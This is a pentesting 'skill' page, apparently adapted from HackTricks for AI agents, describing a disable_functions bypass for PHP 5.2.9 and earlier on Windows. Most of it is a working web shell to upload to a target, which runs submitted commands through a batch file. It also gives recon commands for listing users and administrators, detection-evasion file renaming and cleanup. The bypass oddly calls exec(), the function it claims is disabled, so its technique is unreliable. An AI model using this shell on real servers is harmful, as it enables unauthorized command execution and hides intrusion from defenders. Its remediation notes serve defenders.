Hacktricks-skills php-disable-functions-bypass

Bypass PHP disable_functions restrictions on Windows systems running PHP <= 5.2.9. Use this skill when performing authorized security assessments on legacy Windows PHP applications where functions like exec(), system(), shell_exec() are disabled. This technique exploits Windows path separator handling to execute commands via batch files. Only use on systems you have explicit authorization to test.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest:

skills/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows/SKILL.MD

source content

PHP disable_functions Bypass (Windows PHP <= 5.2.9)

Overview

This skill provides techniques to bypass PHP's

disable_functions

directive on Windows systems running PHP versions 5.2.9 and earlier. The vulnerability exploits how Windows handles path separators differently than Linux, allowing command execution even when functions like

exec()

system()

, and

shell_exec()

are disabled.

When to Use

Use this skill when:

You have explicit authorization to test a Windows-based PHP application
The target is running PHP version 5.2.9 or earlier
Functions like
```
exec()
```
,
```
system()
```
,
```
shell_exec()
```
,
```
passthru()
```
are disabled in php.ini
You need to execute system commands for security assessment purposes
You're conducting penetration testing or vulnerability assessments

Technical Background

The Vulnerability

On Linux, directory paths must use forward slashes (

/usr/bin/php

). On Windows, both forward slashes and backslashes work (

c:\php

and

c:/php

are equivalent). PHP's implementation doesn't properly distinguish between these on Windows, allowing the backslash character to escape certain restrictions.

Why It Works

When

disable_functions

is enabled in

php.ini

, PHP blocks direct command execution. However, the backslash escape technique allows creating and executing batch files indirectly, bypassing the restriction.

Exploitation Technique

Step 1: Create the Exploit Script

Upload the following PHP script to the target server:

<?php
// disable_functions_bypass.php
// Bypass for PHP <= 5.2.9 on Windows

$cmd = $_REQUEST['cmd'];
if ($cmd) {
    // Create a batch file with the command
    $batch = fopen("cmd.bat", "w");
    fwrite($batch, "$cmd > abysssec.txt" . "\r\n");
    fwrite($batch, "exit");
    fclose($batch);
    
    // Execute the batch file using backslash escape
    exec("\\start cmd.bat");
    
    // Display results
    echo "<center>";
    echo "<h1>Command Execution Results</h1>";
    echo "<textarea rows=20 cols=60>";
    if (file_exists("abysssec.txt")) {
        require("abysssec.txt");
    }
    echo "</textarea>";
    echo "</center>";
}
?>

<html>
<body bgcolor="#000000" text="#FF0000">
<center>
<form method="post">
    <input type="text" name="cmd" placeholder="Enter command (e.g., whoami, dir, ipconfig)" style="width: 400px;">
    <input type="submit" value="Execute">
</form>
</center>
</body>
</html>

Step 2: Execute Commands

Access the uploaded script via browser and submit commands:

http://target.com/disable_functions_bypass.php

Step 3: Review Output

The script creates

cmd.bat

and

abysssec.txt

in the same directory. Results are displayed in the textarea.

Common Commands for Testing

Command	Purpose
`whoami`	Identify current user context
`dir`	List directory contents
`ipconfig /all`	Network configuration
`systeminfo`	System information
`net user`	List local users
`net localgroup administrators`	List administrators
`hostname`	Get machine name

Detection Evasion

File Naming

Use obfuscated names to avoid detection:

cmd.bat

→

temp_file.tmp

update.log

error_report.txt

abysssec.txt

→

debug.txt

cache.dat

session.tmp

Cleanup

After testing, remove created files:

<?php
// Cleanup script
@unlink("cmd.bat");
@unlink("abysssec.txt");
echo "Files cleaned up";
?>

Limitations

Version Specific: Only works on PHP <= 5.2.9
Platform Specific: Only works on Windows
File Permissions: Requires write permissions to the web directory
Modern Systems: Ineffective on PHP 5.3+ and all Linux systems

Verification

Before attempting exploitation, verify the target meets requirements:

Check PHP Version: Look for version banners in HTTP headers or error messages
Confirm Windows: Check for Windows-specific error messages or headers
Test disable_functions: Try executing a simple command to confirm restrictions

<?php
// Check if exec is disabled
if (function_exists('exec')) {
    echo "exec() is available - no bypass needed";
} else {
    echo "exec() is disabled - bypass may be possible";
}

// Check PHP version
phpinfo();
?>

Legal and Ethical Considerations

⚠️ IMPORTANT: Only use this technique on systems where you have:

Written authorization from the system owner
Explicit permission in your scope of work
Proper legal documentation (engagement letter, rules of engagement)

Unauthorized use of this technique may violate:

Computer Fraud and Abuse Act (CFAA)
Local cybersecurity laws
Terms of service agreements

References

Original Advisory: Abysssec Inc Public Advisory
CVE: Not formally assigned (version-specific vulnerability)
Platform: Windows with PHP <= 5.2.9

Related Techniques

If this bypass doesn't work, consider:

PHP filter wrappers (
```
php://filter
```
)
```
assert()
```
function exploitation
```
preg_replace()
```
with
```
/e
```
modifier (PHP < 5.5)
```
base64_decode()
```
with
```
eval()
```
```
create_function()
```
exploitation

Remediation

For system administrators:

Upgrade PHP: Move to PHP 7.4+ (PHP 5.x is end-of-life)
Use suhosin: Install Suhosin PHP extension for additional protection
Disable dangerous functions: Keep
```
disable_functions
```
but understand its limitations
File permissions: Restrict write access to web directories
Web Application Firewall: Deploy WAF to detect and block exploitation attempts